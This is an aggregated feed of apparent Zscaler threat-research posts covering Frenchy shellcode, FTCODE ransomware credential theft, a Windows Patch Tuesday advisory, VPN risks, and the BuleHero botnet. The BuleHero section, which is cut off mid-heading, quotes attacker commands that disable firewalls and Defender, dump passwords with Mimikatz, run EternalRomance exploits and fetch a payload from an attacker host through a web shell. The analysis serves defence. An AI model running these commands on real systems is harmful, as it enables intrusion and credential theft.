Feed aggregator

For the past few months, the Zscaler ThreatLabZ research team has seen a number of AutoIt and .NET samples from different malware families using what is being called Frenchy shellcode. The name is so given because of the mutex name it creates: frenchy_shellcode_{version}. In this blog, we will provide a brief analysis of a .NET sample using the Frenchy shellcode and also provide an overview of various malware types that are using it. As the execution of the malware begins, it extracts an embedded compressed resource with the name asmz://4da3bcc9092d2b15c67c8bb6a3248c6d/279552/z‎. When decompressed, this resource turns out to be a dynamic-link library (DLL) file, which is also .NET compiled with the MD5 2d80d567add3e9ebe93118c28fd96ad8. Figure 1: Decompression routine    Figure 2: Compressed resource name stored in the variable Control is transferred to this extracted DLL by invoking one of its routines named Average(). Figure 3: Average() function invoked in the extracted DLL During execution, this DLL extracts the embedded AES-encrypted resource with the name 501Yek31KY. The AES key used for decryption is hardcoded with the value zlauDo4j2s76f3bAu7vJla9qxo4T9fDA. On decryption, the file turns out to be another .NET compiled executable with the MD5 9f93df82804d1467ba0096f91ecf091b.   When execution begins, the executable performs two checks for virtual environment detection and terminates itself if either of the two is successful:                 1. If SbieDll.dll is present                 2. If the caption of the main window of any of the running process is empty   For persistence, it creates a copy of itself in the %APPDATA%/Tasks/ folder with the name ThumbnailExtractionHost.exe, a VBS file with the name vTzzHA5v.vbs in the same folder to invoke ThumbnailExtractionHost.exe and a URL file in the startup directory with the name 89f429NZ.url to invoke vTzzHA5v.vbs. Finally, the Frenchy shellcode and the main malware binary are extracted. This executable contains two resources encrypted with Advanced Encryption Standard (AES). One resource with the name 9BMPzLT7ztLkxO7r contains the Frenchy shellcode and another with the name HC8354RuK8FCQSpg‎ contains the main malware binary.   Figure 4: AES encrypted resource – malware payload   Figure 5: Extracted main malware payload [MD5: ac8ef8b4aeede1adab7366ca7e5a75be (AgentTesla)]   Figure 6: AES encrypted resource – Frenchy shellcode   Figure 7: Extracted Frenchy shellcode [MD5: abdb5f121849f3f3718768d37abe0173] Memory is allocated for the shellcode and main payload. Control is transferred to the Frenchy shellcode by creating a delegate using its memory location pointer along with two arguments:   Currently executing binary full path  Pointer to memory location of main payload Figure 8: Control transferred to Frenchy shellcode memory location   Frenchy Shellcode Analysis The main functionality of the shellcode is to perform hollow process injection, which injects malicious code in system memory. Execution of the shellcode starts with a relative jump instruction with the two arguments passed to the shellcode available on the stack. Following the jump instruction, all the strings that will be used by the shellcode are generated on the stack. The interesting thing that this shellcode does is map all the required DLL again in the memory and make further calls via these newly loaded DLLs. This function helps bypass API monitoring that is done by some sandboxes in the user space. Four DLLs, namely advapi32.dll, ntdll.dll, user32.dll, and kerne32.dll, are mapped using the ZwOpenSection and ZwMapViewOfSection APIs. The DLL name used for ZwOpenSection is in the following format: \\KnownDlls32\\{dll_name}.dll. Once the kernel32.dll is loaded, Frenchy shellcode extracts the address of LoadLibrary and GetProcAddress to load further required DLLs and extract necessary API addresses. Now, when this initialization phase is complete, the shellcode’s main functionality begins. First, it creates the mutex with the name frenchy _shellcode_{version} where {version} is 002 in this case.   Figure 9: Frenchy shellcode version 002 Frenchy shellcode creates a process of currently executing binary in suspended mode. Figure 10: Creating new process in suspended mode It creates a new section to be shared with the newly created process. Figure 11: Shared section Finally, the shellcode maps the view of this section into a newly created process, copies the main malware payload to this mapped view, modifies and sets the context of the newly created process, and starts the process main thread by calling NtResumeThread.   Malware variants using the Frenchy shellcode: Win32.Backdoor.404Keylogger                       6a8a308fd9d93877405edddaca2dc0b1 Win32.Backdoor.AgentTesla                           ff87170119ffe5da1a9933eac4813e89 Win32.Backdoor.AysncRAT                            4e0620db87741809db739b36d493efd3 Win32.Backdoor.DarkComet                          aca05d97aa34360a18ce7e4a331195b8 Win32.Backdoor.HawkEye                             c1da6168e4ce782169295858057d6a82 Win32.Backdoor.Keybase                              db5fe533c78602a3d4e5a2a307782855 Win32.Backdoor.LimeRat                               7f3b73f4680cd45b2f06cd991c26b60a Win32.Backdoor.Nanocore                             d18509eb899f634f579e154b226c1f72 Win32.Backdoor.NetWiredRC                        2d1ed53e7af0864f0916a4ce4f5e40b7 Win32.Backdoor.NjRat                                   a7b38bf292212efd6c0bf11060483b19 Win32.Backdoor.NjRatLime                           88c674e2dcd55b5e8672c1a063d06fd4 Win32.Backdoor.PhoenixKeylogger               382609b2a5c90f287b466f55911238d2 Win32.Backdoor.PredatorLogger                   16cbd896990793871fd3fd7bcd23cf1a Win32.Backdoor.QuasarRAT                         db07aca234c3f12a141760cfc6a46e0e Win32.Backdoor.RemcosRAT                        4ef1c56657d74aa09d77573273f99750 Win32.PWS.AZORult                                     6e33a3075b667eab19647f1d149a510f Win32.PWS.FormBook                                  6e685961cc335b33d05e6415700fcf96 Win32.Ransom.Adame                                  20716b0abbf051ec151fecc0cc957145 Win32.Ransom.Phobos                                  0e1b676f95c0e51163178ffdd99817c8 Win32.Trojan.APT33                                      9aa2f7959f31196f6c5aa37ae3c5a2ae   Conclusion Zscaler ThreatLabZ is actively tracking this mode of delivery and malware families involved to ensure coverage for Zscaler customers.    

Recently, the Zscaler ThreatLabZ team came across PowerShell-based ransomware called “FTCODE,” which targets Italian-language users. An earlier version of FTCODE ransomware was being downloaded using a document file that contained malicious macros. In the recent campaign, the ransomware is being downloaded using VBScript. Figure 1: FTCODE downloaders observed in the Zscaler cloud (Office documents in red and VBScripts in yellow) The latest version we’ve seen in the Zscaler cloud contains version number 1117.1. We also came across this malware with version numbers from 1001.7 to 1117.1. In this blog, we’ll describe the infection method and its techniques for stealing credentials.   Technical details Infection starts with spam emails containing malicious macro documents and, more recently, containing links to VBScripts that further download a PowerShell script known as FTCODE ransomware. Once a user executes the VBScript, it executes the PowerShell script shown in the screenshot below. Figure 2: PowerShell script to download a decoy image and the ransomware   The script first downloads a decoy image into the %temp% folder and opens it trying to trick users into believing that they simply received an image, but in the background, it downloads and runs the ransomware.   Figure 3: Decoy image   The downloaded script is saved in %Public%\Libraries\WindowsIndexingService.vbs. The screenshot below displays the command-and-control (C&C) request for downloading the VBScript.   Figure 4: C&C communication request to download VBScript   Persistence Further, the malware creates a shortcut file called windowsIndexingService.lnk in the victim’s startup folder, so it will execute at every reboot. The shortcut file executes the %Public%\Libraries\WindowsIndexingService.vbs. It also creates a scheduled task named WindowsApplicationService for executing the WindowsIndexingService.vbs file. FTCODE checks if the file \%temp%\quanto00.tmp exists. If the file exists and was created more than 30 minutes ago, FTCODE will write the current time in the file; otherwise, it will exit the script. It also checks for the file %public%\OracleKit\w00log03.tmp that contains GUID; if it doesn’t find the file, it writes GUID into the file w00log03.tmp and changes the file attribute to hidden.   C&C communication The malware sends information to its C&C as shown in the screenshot below. Figure 5: Sending data to the C&C   ver = 1117.1 version vid = vb5, specific campaign identifier guid = GUID  ext =  first 6 characters of newly generated GUID (Extension of encrypted file) r1 = base 64 encoded (base 64 encode(encrypted (8 character GUID + 42 random characters)); Base 64 encoded(encrypted((Random 23 + Random 11)))) The malware creates random characters and is encrypted using the RSA algorithm. The RSA key is hardcoded in the script. Those randomly generated strings are used to generate a password. After getting a response from the server, the malware writes the current date-time into /%temp%/quanto00.tmp. If it doesn’t get any response, it will terminate itself. After that, it sends another post request to the C&C server with the &status=start parameter as shown below and starts the encryption process.   Figure 6: Sending status update to C&C   Encryption The malware searches for all drives with at least 50kb of free space and starts encrypting the files with the extensions below. Figure 7: Extension list for encryption   FTCODE generates a password using GUID and a random character set generated earlier. It uses Rijndael symmetric key encryption to encrypt the 40960 bytes of each of the above extension files. The initialization vector is based on 11 randomly generated characters.    Figure 8: Encryption code After encrypting files, FTCODE appends the extension to the “first 6 characters of newly generated GUID” and drops the ransom note "READ_ME_NOW.htm" in the directory that contains the encrypted files. The personal ID in the ransom note is the newly generated GUID. Figure 9: Ransom note   The earlier FTCODE version’s encryption key was generated based on a hardcoded string "BXCODE hack your system" and randomly generated key. The earlier version’s initialization vector was based on the hardcoded string "BXCODE INIT." The earlier version (1001.1) of FTCODE adds the .FTCODE extension after encryption. All versions use the same ransom note.   Stealer capability The latest version of FTCODE added stealing functionality which was absent in earlier versions. It steals credentials from the browsers below as well as email clients. Internet Explorer Mozilla Firefox Mozilla Thunderbird Google Chrome Microsoft Outlook  Internet Explorer The script steals the stored credentials from the Internet Explorer web browser and gets the history folder using $shell.NameSpace(34). It takes history details and decrypts the stored credentials from information in the registry HKCU:\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. It also checks to see if the operating system is above Windows 7, then it fetches credentials from the vault as shown in the code below.   Figure 10: Code to steal credentials from vault Mozilla Firefox and Mozilla Thunderbird The script checks the below paths and fetches the credentials from the Mozilla Firefox browser and the Mozilla Thunderbird email client. SystemDrive\Program Files\Mozilla Firefox SystemDrive\Program Files\Mozilla Thunderbird SystemDrive\Program Files (x86)\Mozilla Firefox SystemDrive\Program Files (x86)\Mozilla Thunderbird Google Chrome The script steals credentials from the Google Chrome browser from the file \%UserProfile%\AppData\Local\Google\Chrome\User Data\*\Login Data.   Figure 11: Code to steal credentials from the Google Chrome browser Microsoft Outlook The script steals saved credentials by accessing the following registry key. HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\*\9375CFF0413111d3B88A00104B2A6676\* HKCU:\Software\Microsoft\Office\1[56].0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\* Next, it sends a post request with the guid=temp_1235266078&crederror=start chooseArch data to kind.its1ofakind[.]com. Further, it sends the stolen data to its C&C as shown in the below screenshot.   Figure 12: Sending stolen credentials to C&C   guid = hardcoded in script cred = stolen credentials The stolen credentials are in the below format. Username and password are Base64 encoded. Format: {"URL":[{"Username":"Password"},{"Username":"Password"}] Finally, after sending data, it sends a post request with guid=temp_1235266078&crederror=SUCCESS.   Conclusion The FTCODE ransomware campaign is rapidly changing. Due to the scripting language it was written in, it offers multiple advantages to threat actors, enabling them to easily add or remove features or make tweaks much more easily than is possible with traditionally compiled malware. The Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.   IOCs: Md5 d597ea78067725ae05a3432a9088caae c8a214f432fc9d74c913c02e7918fc0 f96253923e833362ecac97729d528f8c cc0f64afa3101809b549cc5630bbd948 328ce454698307f976baa909e5c646c7 71a8d8c0543a99b8791e1cfaeeeb9211 f0aa45bb9dd09cfac9d93427a8f5c72c d6da191bfc5966dd4262376603d4e8c1 cc5946ce893ff37ace8de210923467a2 7f5bb4529b95a872a916cc24b155c4cc edd5fbe846fa51f3b555185627d0d6c5 a2e88f9486cc838eae038a8ba32352f3 eab63ee2434417bc46466df07dc6b5b5 fd46c05b99d00e11d34b93eae2c7ff2b 98d2221445c2c8528cef06e4ef3c9e36 URLs: luigicafagna[.]it home[.]southerntransitions[.]net nomi[.]tugnutz[.]com home[.]ktxhome[.]com dhol[.]rkeindustries[.]net way[.]securewebgateway[.]com stats[.]thomasmargiotti[.]com pups[.]pupusas[.]net print[.]impressnaples[.]com print[.]impress-screen-printing[.]com power[.]hagertyquote[.]com men[.]unifiedthreatmanagementutm[.]com kind[.]its1ofakind[.]com ese[.]emarv[.]com ehuxmtkxmdqy[.]top connect[.]simplebutmatters[.]com connect[.]heritageagencies[.]com ceco[.]heritageins[.]co cdn[.]danielrmurray[.]com bxfmmtkxmdqy[.]top biz[.]lotsofbiz[.]com amq1mtkxmdqy[.]top ahmwmtkxmdqy[.]top agvlmtkxmtq4[.]top agvlmtkxmdqy[.]top    

Background Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. Some of the issues that were patched in today's update are critical and has prompted an emergency directive from Cybersecurity and Infrastructure Security Agency (CISA) for certain U.S. government agencies. It is important for everyone running the vulnerable operating system to apply this security update. Large organizations following 15/30/60-day patch cycles should consider making an exception and apply the patches as soon as possible, especially if running one of the vulnerable operating systems.   What are the issues? 1. CVE-2020-0601 - CryptoAPI spoofing vulnerability A spoofing vulnerability exists in the way Windows CryptoAPI validates the Elliptic Curve Cryptography (ECC) certificates. This vulnerability allows an attacker to use spoofed ECC certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts. Systems impacted: Several versions of Windows 10 and Windows Server 2016, 2019 [Check the reference for specific details] 2. CVE-2020-0609, CVE-2020-0610 -  Windows Remote Desktop Gateway remote code execution vulnerability An unauthenticated attacker could exploit a remote code execution vulnerability in Windows Remote Desktop Gateway by connecting over RDP and sending specially crafted requests. No user interaction is required for exploiting this vulnerability. Systems impacted: Windows Server 2012, 2016, 2019 [Check the reference for specific details] 3. CVE-2020-0611 - Windows Remote Desktop Client remote code execution vulnerability An attacker could exploit a remote code execution vulnerability in Windows Remote Desktop Client by tricking the user into connecting to a malicious server hosting this exploit. Systems impacted: Several versions of Windows 7, 8, 10 and Windows Server 2008, 2012, 2016, 2019 [Check the reference for specific details] What can you do to protect yourself? Apply the security updates released by Microsoft immediately from the following location: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan Zscaler coverage Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats, such as ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage. We have also deployed several in-line signatures for detecting exploitation attempts of CryptoAPI spoofing vulnerability.  Additionally, Zscaler customers can leverage SSL inspection feature and block such spoofed certificates under 'Untrusted Server Certificates'. This will block any connection to destinations serving such spoofed certificates. Reference:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611

Another day and, unfortunately, another cyberattack accidentally introduced by VPN. According to a Computer Weekly article, Travelex was hit by Sodinokibi ransomware, which disabled the foreign exchange company’s IT systems on New Year’s Eve. The attack was made possible when the company forgot to patch its Pulse Secure VPN servers.  Sadly, these reports are becoming common as VPNs are now the favorite target of cybercriminals.   Antiquated leads to attacked When remote access VPNs were first introduced 30 years ago, they were pretty awesome. Remote access from anywhere was a concept that was forward-thinking and game-changing. But VPNs were created during a time when most apps were running in the data center, which could easily be secured with a bunch of network security appliances. However, the world has changed as internal apps have moved to the cloud. You have to deliver a great experience, which is what users expect, with the knowledge that 98 percent of security attacks stem from the internet. Remote access VPNs require servers to be exposed to the internet and users to be placed onto the corporate network through static tunnels that drive holes through firewalls. Now the very same technology built to protect businesses has left them vulnerable to modern malware and ransomware attacks.  So how exactly does this happen?   Footprint of a malware attack Just this past week, Medium.com published an article describing how Sodinokibi ransomware gets introduced via a VPN. Let’s take a high-level look at the typical process for how malware is introduced to a network through a VPN vulnerability:   Cybercriminals scan the internet for unpatched remote access VPN servers. Remote access to the network is achieved (without valid usernames or passwords). Attackers view logs and cached passwords in plain text. Domain admin access is gained. Lateral movement takes place across the entire network. Multifactor authentication (MFA) and endpoint security are disabled. Ransomware (ex. Sodinokibi) is pushed to network systems. The company is held up for ransom. Negative impacts of VPN Many organizations still feel that remote-access VPNs are necessary. And, in some cases, they may very well be. But, more often, VPNs are opening the network to the internet and, as a result, the business to increased risk.    Patching is often slow or forgotten – Remembering, and even finding time to patch VPN servers, is plain difficult. Teams are asked to do more with less, often creating a human challenge that leads to security vulnerabilities.   Placing users on the network – Perhaps the genesis of all the issues related to remote-access VPNs. For VPNs to work, networks must be discoverable. This exposure opens the organization to attack. Lateral risk at exponential scale – Once on the network, malware can spread laterally, despite efforts to perform network segmentation (which is a complex process in itself). As mentioned above, this can also lead to the takedown of other security technologies, such as MFA and endpoint security. The business’ reputation – Your customers trust that you will protect their information and provide the best level of service to them. To do this, businesses must be able to protect themselves. News of a ransomware attack has a detrimental impact on your brand reputation. Making the case for a new approach The negative impacts of VPN have led to a search for an alternative solution. Gartner says that this buzz has created a world where, “By 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favor of zero trust network access (ZTNA).” If you are considering alternative methods, such as ZTNA, keep these points in mind when positioning it to your executives:   Minimize business risk – ZTNA allows for access to specific business applications (based on policy) without the need for network access. Also, there is no infrastructure ever exposed, so ZTNA removes the visibility of apps and services on the internet. Reduce costs – ZTNA can often be fully cloud-delivered as a service, which means there are no servers to purchase, patch, or manage. This is not limited to just the VPN server. The entire VPN inbound gateway can now be smaller or fully removed (external firewall, DDoS, VPN, internal firewall, load balancer, etc.). Deliver a better user experience – Given the increased availability of cloud ZTNA services when compared to limited VPN inbound appliance gateways, remote users are provided with a faster and more seamless access experience regardless of application, device or location. NOTE: Not all ZTNA solutions are the same. Beware of vendors that call themselves “zero trust” but offer solutions that continue to place users on the network and expose business apps to the internet. If you’re looking to replace your remote access VPN, you might find this page helpful. In the meantime, don’t forget to patch your VPN servers! Christopher Hines is the Head of Product Marketing for Zscaler Private Access and Z App.

Ever since the 2017 outbreak of WannaCry, NotPetya, and BadRabbit ransomware, as well as the WannaMine cryptocurrency campaign, there has been a steep increase in malware that uses the now infamous ShadowBroker’s leaked exploits—EternalBlue, EternalChampion, EternalRomance, and EternalSynergy—for lateral propagation. Alongside these exploits, many other modules such as MimiKatz, PsExec, and WMIC have been observed as a means to propagate malware on networks. Traditional attack vectors like brute force attacks are also playing a crucial role in infecting other hosts to spread malware. The ThreatLabZ team is keeping a close eye on these and other new lateral movement techniques and the malware they are attempting to propagate. While doing research on this topic, we landed on a botnet called “BuleHero,” which has a number of lateral movement techniques embedded in it. In this report, we will provide a brief overview of the malware dropped by the BuleHero botnet, while focusing on the lateral movement aspect of BuleHero botnet. BuleHero is named after the domain “bulehero[.]in,” which was found in the initial botnet binary. This botnet leverages a variety of web exploits to enable it to intrude on unpatched web servers. It also contains many other exploits to help it spread across the network. It not only tries to spread on internal networks but also on the internet. The Zscaler Cloud Sandbox service detected this malware. URL: aa[.]0xbdairolkoie[.]space/xs.exe MD5: F864506F9797592321CF4C6A0BB5F199 Let's take a deeper look into the different modules of this botnet. The “xs.exe” is an installer file that downloads “swpuhostd.exe” from the URL “aa[.]0xbdairolkoie[.]space/swpuhostd.exe” and stores it at “C:\WebKitSdk\2.25.16\swpuhostd.exe” location. It then fetches the configuration file (cfg.ini) from one of the nine hardcoded URLs. hxxp://xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini hxxp://qb[.]1c1c1c1c[.]best:63145/cfg[.]ini hxxp://ce[.]1c1c1c1c[.]club:63145/cfg[.]ini hxxp://jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini hxxp://eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini hxxp://rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini hxxp://ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini hxxp://cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini hxxp://ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini Fig 1: BuleHero configuration The botnet looks for new updates from the IPs 172.104.91.191 and 139.162.2.123. The URL “hxxp://fk[.]0xbdairolkoie[.]space/download.exe” is part of the payload or shellcode used to compromise other machines on the network. Upon successful exploitation, the file downloaded from this rule is executed on the infected system, which, in turn, tries to spread from that machine. The botnet contains an embedded miner file that connects to “mi.oops[.]best:80, mx.oops[.]best:443” mining pool.  On a successful run, it creates a copy of itself at the below location on the infected system. C:\\Windows\\uhctnicb\\mftzlgg.exe C:\\Windows\\Fonts\\mftzlgg.exe %TEMP%\\388954562\\TemporaryFile To be persistent on the system, the malware does the following: Creates a service with name “bnttpgkqt” and with BinaryPathName as "C:\\Windows\\uhctnicb\\mftzlgg.exe" Creates a task with the name “bicfnzlke,” which triggers the main malware file every minute with full permissionscmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"bicfnzlke\" /ru system /tr \"cmd /c  C:\\Windows\\Fonts\\mftzlgg.exe\" Makes a run entry with the name “bnttpgkqt” for “C:\Windows\uhctnicb\mftzlgg.exe” at “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” It also tries to bypass the security measures on the system, like firewalls. The botnet first deletes all the firewall rules and later it adds a few in order to enable access to the NetBIOS and SMB protocol.  Below are the commands found in the binary that manipulates the firewall rules: netsh ipsec static delete all netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList netsh ipsec static set policy name=Bastards assign=y netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList netsh ipsec static set policy name=Bastards assign=y netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList netsh ipsec static set policy name=Bastards assign=y cmd /c net stop SharedAccess cmd /c netsh firewall set opmode mode=disable cmd /c netsh Advfirewall set allprofiles state off cmd /c net stop MpsSvc cmd /c net stop WinDefend cmd /c net stop wuauserv cmd /c sc config MpsSvc start= disabled cmd /c sc config SharedAccess start= disabled cmd /c sc config WinDefend start= disabled cmd /c sc config wuauserv start= disabled The malware also changes the below file associations in HKEY_CLASSES_ROOT to txtfile for the files with these extensions “.bat, .cmd, .js, .vbs, .vbe, .reg, .ps1.” The botnet contains many embedded files in it. It drops those files in the following directory structure at “C:\Windows\ziheeghmq”: Fig 2: Drop location Corporate – Mimikatz password grabbing tool qvrmuzmcf – Port scanning tools UnattendGC – Eternal Blue attack kit It drops XMRig miner at “%TEMP%\\cnaqzbggt\\svtink.exe” and it also drops a Gh0st RAT at “%systemroot%\\vqbbqs.exe.”   Payloads XMRig Miner: The XMRig miner uses a configuration file “%TEMP%\\cnaqzbggt\\config.json” dropped by the botnet. Fig 3: XMRig miner configuration file   It’s compiled with open-source XMRig miner and uses “mi.oops[.]best:80” and “mx.oops[.]best:443” mining pool. Fig 4: XMRig miner network communication   Gh0st RAT: Gh0st RAT is an open-source RAT. The source code is public and it has been used by multiple groups. First, it creates a service of itself with the name “EaepRegSvc.” It creates a mutex of the name “ox.mygoodluck.best:12000:EaepRegSvc." It makes a DNS request for ox.mygoodluck[.]best to get the IP address, which is 185.147.34[.]106. This RAT communicates on 185.147.34[.]106:12000 to receive commands and send the data with encryption. Fig 5: Gh0st RAT CNC traffic   Lateral movement To this point, we have provided a few details about the embedded malware payloads dropped by the BuleHero botnet. Now we will shift our focus to the lateral movement modules, which are embedded in this botnet. Below are the modules that are used to perform lateral spreading.   Port Scanning In order to spread across a network, it is important for malware to scan the network to identify the exposed and vulnerable machines connected to the network. To achieve this scan, “Swpuhostd.exe” drops a port scanning tool at the location “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\vqfevffuz.exe.” The botnet first fetches the public IP address of the infected system by accessing “hxxp://v4.ipv6-test[.]com/api/myip.php, from which it generates the IP subnet of the public network of the infected system and stores it into “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\ip.txt.” It also adds intranet subnets and public subnets which are randomly generated by the botnet. Fig 6: IP subnets in “ip.txt” After creating the IP ranges, the botnet starts the port scanning module to scan IP addresses specified in the ip.txt with a given port. The botnet also generates ports that are given as input to the below command. It generates ports that belong to web applications. It also contains a few hard-coded ports like 135 (DCE/RPC), 139 (NetBIOS), 445 (SMB), and 3389 (RDP). Scanning command struture:cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p Example cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8020 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8040 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 7001 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 7070 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8050 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8282 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8082 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8085 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8087 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8088 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8983 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8060 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8080 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 9090 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8001 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8083 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8888 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 8181 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 135 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 445 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 80 cmd /c  vqfevffuz.exe -iL  ip.txt -oJ  Result.txt --open --rate 4096 -p 88 In this version of BuleHero botnet, we also observed scanning for an RDP service. The botnet starts this scanning on a hard-coded IP subnet 222.186.55.1-222.186.155.255. It also scans port 80 on this subnet. It saves the IP addresses that have ports 80 and 3389 open to Scantest.txt. The port scanning happens sequentially and its results are accumulated into Result.txt. The results of the scanning process are the active IP addresses that have those ports opened up.  cmd /c vqfevffuz.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ Scantest.txt Interestingly, the botnet deletes the generated “Scantest.txt” file without using it. This suggests that the BuleHero botnet authors are trying to integrate RDP scanning, possibly enabling future exploits for RDP such as Bluekeep or attacking the RDP service with traditional brute-force attacks. Fig 7: RDP scanning   Lateral movement components Mimikatz The botnet drops the “Mimikatz” tool at “C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe” for dumping passwords from infected hosts. These passwords are used to log into systems connected to the botnet.  cmd /c C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\ziheeghmq\\Corporate\\log.txt Fig 8: Running Mimikatz to extract credentials These obtained passwords are then used by PsExec and WMIC to spread the malware onto the network.   PsExec and WMIC The botnet drops the PsExec tool at the location “C:\\Windows\\ziheeghmq\\Corporate\\scvhost.exe” and it uses the WMIC tool, which is already present on Windows systems. The botnet first launches PsExec to execute the malware on a remote machine, but if it fails it then uses WMIC to execute the malware. Along with Mimikatz input, the botnet contains a dictionary of usernames and passwords to carry out a brute-force attack on a remote machine.  PsExec command:scvhost.exe /accepteula \\[remote_machine] -d -c -u -p “cmd.exe /c [command]” Fig 9: Remote execution using PsExec   WMIC command:wmic.exe /node:[targetMachine] /user:[userName] /password:[password] process call create “cmd.exe /c [command]” Fig 10: Remote execution using WMIC   SMB Exploitation The botnet stores the ShadowBroker’s NSA leaked Fuzzbunch like the SMB exploitation toolkit at the directory “C:\\Windows\\ziheeghmq\\UnattendGC.” The toolkit contains EternalBlue, EternalRomance, EternalChampion exploits, backdoor DoublePulsar, and the SMBtouch utility.  Fig 11: SMB exploits package The botnet reads the scanning result of the port scanner tool after running it against ports 139 and 445, which is present at “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\Result.txt.” The botnet runs the SMBtouch utility to scan for vulnerable hosts. SMB touch command:vimpcsvc.exe  --InConfig vimpcsvc.xml --TargetIp 106.51.178.148 --TargetPort 445 --NetworkTimeout 60 --Protocol SMB --OutConfig 106.51.178.148.xml  It then launches SMB exploits onto the vulnerable machine with shellcode, which injects the final payload (AppCapture32.dll or AppCapture64.dll) into one of the legitimate processes of the target machine. Below is one such example in which we observed that EternalRomance was being used to exploit the system. Eternal Romance and Double Pulsar commandcmd /c docmicfg.exe --InConfig docmicfg.xml --TargetIp 106.51.3.141 --TargetPort 445 --NetworkTimeout 30 --Protocol SMB --Target WIN7_SP1 --TargetOsArchitecture x86 --Credentials Anonymous --PipeName samr --ShellcodeFile Shellcode.ini & svschost.exe --InConfig svschost.xml --TargetIp 106.51.3.141 --TargetPort 445 --DllPayload AppCapture32.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll The payload DLL downloads the BuleHero malware from “hxxp://fk.0xbdairolkoie[.]website/download.exe” and stores it at “C:\\WebKit\\2.250.20\\fxxkmylife0xa.exe” before executing it. Fig 12: Payload after SMB exploitation Along with the SMB exploits, the botnet contains exploits for well-known web applications. These exploits are fired against web servers obtained from the post scanning result.   Web Application Exploits Apache Tomcat PUTs vulnerability (CVE-2017-12615) This vulnerability affects Apache Tomcat 7.0.0 to 7.0.79 on Windows with the HTTP PUTs method enabled. It uploads a maliciously crafted JSP file to the server.  Fig 13: Crafting request after uploading FxCodeShell.jsp   Exploit::/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http%3A%2F%2Ffk.0xbdairolkoie.space%2Fdownload.exe Apache Struts RCE vulnerability 